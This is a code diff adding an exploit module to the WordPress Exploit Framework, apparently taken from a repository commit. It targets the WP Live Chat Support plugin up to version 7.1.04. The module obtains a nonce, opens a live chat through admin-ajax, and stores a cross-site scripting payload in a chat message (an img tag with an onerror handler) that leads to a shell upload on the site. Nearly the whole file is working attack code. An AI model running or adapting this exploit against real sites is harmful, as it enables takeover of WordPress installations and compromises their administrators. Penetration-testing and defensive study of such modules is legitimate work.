|
| 1 | +class Wpxf::Exploit::WpLiveChatSupportStoredXssShellUpload < Wpxf::Module |
| 2 | + include Wpxf::WordPress::StoredXss |
| 3 | + |
| 4 | + def initialize |
| 5 | + super |
| 6 | + |
| 7 | + update_info( |
| 8 | + name: 'WP Live Chat Support <= 7.1.04 Stored XSS Shell Upload', |
| 9 | + author: [ |
| 10 | + 'Omaid Faizyar', # Disclosure |
| 11 | + 'Rob Carr <rob[at]rastating.com>' # WPXF module |
| 12 | + ], |
| 13 | + references: [ |
| 14 | + ['WPVDB', '8880'], |
| 15 | + ['URL', 'https://github.com/CodeCabin/wp-live-chat-support/issues/358'] |
| 16 | + ], |
| 17 | + date: 'Jul 20 2017' |
| 18 | + ) |
| 19 | + |
| 20 | + register_options([ |
| 21 | + StringOption.new( |
| 22 | + name: 'chat_name', |
| 23 | + desc: 'The name to use in the live chat', |
| 24 | + required: true |
| 25 | + ), |
| 26 | + StringOption.new( |
| 27 | + name: 'chat_email', |
| 28 | + desc: 'The e-mail address to use in the live chat', |
| 29 | + required: true |
| 30 | + ) |
| 31 | + ]) |
| 32 | + end |
| 33 | + |
| 34 | + def check |
| 35 | + check_plugin_version_from_changelog('wp-live-chat-support', 'readme.txt', '7.1.05') |
| 36 | + end |
| 37 | + |
| 38 | + def vulnerable_page |
| 39 | + 'the live chat window' |
| 40 | + end |
| 41 | + |
| 42 | + def find_nonce |
| 43 | + res = execute_get_request(url: full_uri) |
| 44 | + return nil unless res && res.code == 200 |
| 45 | + |
| 46 | + res.body.match(/wplc_nonce\s=\s"(.+?)";/)[1] |
| 47 | + end |
| 48 | + |
| 49 | + def initiate_chat(nonce) |
| 50 | + res = execute_post_request( |
| 51 | + url: wordpress_url_admin_ajax, |
| 52 | + body: { |
| 53 | + 'action' => 'wplc_start_chat', |
| 54 | + 'security' => nonce, |
| 55 | + 'name' => datastore['chat_name'], |
| 56 | + 'email' => datastore['chat_email'] |
| 57 | + } |
| 58 | + ) |
| 59 | + |
| 60 | + return nil unless res && res.code == 200 |
| 61 | + res.body.strip.to_i |
| 62 | + end |
| 63 | + |
| 64 | + def before_store |
| 65 | + emit_info 'Acquiring a security token...' |
| 66 | + self.nonce = find_nonce |
| 67 | + |
| 68 | + if nonce.nil? |
| 69 | + emit_error 'Failed to acquire a nonce' |
| 70 | + return false |
| 71 | + end |
| 72 | + |
| 73 | + emit_info 'Initiating a new live chat...' |
| 74 | + self.chat_id = initiate_chat(nonce) |
| 75 | + if chat_id.nil? |
| 76 | + emit_error 'Failed to start a live chat' |
| 77 | + return false |
| 78 | + end |
| 79 | + |
| 80 | + true |
| 81 | + end |
| 82 | + |
| 83 | + def store_script |
| 84 | + execute_post_request( |
| 85 | + url: wordpress_url_admin_ajax, |
| 86 | + body: { |
| 87 | + 'action' => 'wplc_user_send_msg', |
| 88 | + 'security' => nonce, |
| 89 | + 'cid' => chat_id, |
| 90 | + 'msg' => "#{Utility::Text.rand_alpha(1)}</title><img src=x onerror=#{xss_ascii_encoded_include_script}>" |
| 91 | + } |
| 92 | + ) |
| 93 | + end |
| 94 | + |
| 95 | + attr_accessor :nonce |
| 96 | + attr_accessor :chat_id |
| 97 | +end |
0 commit comments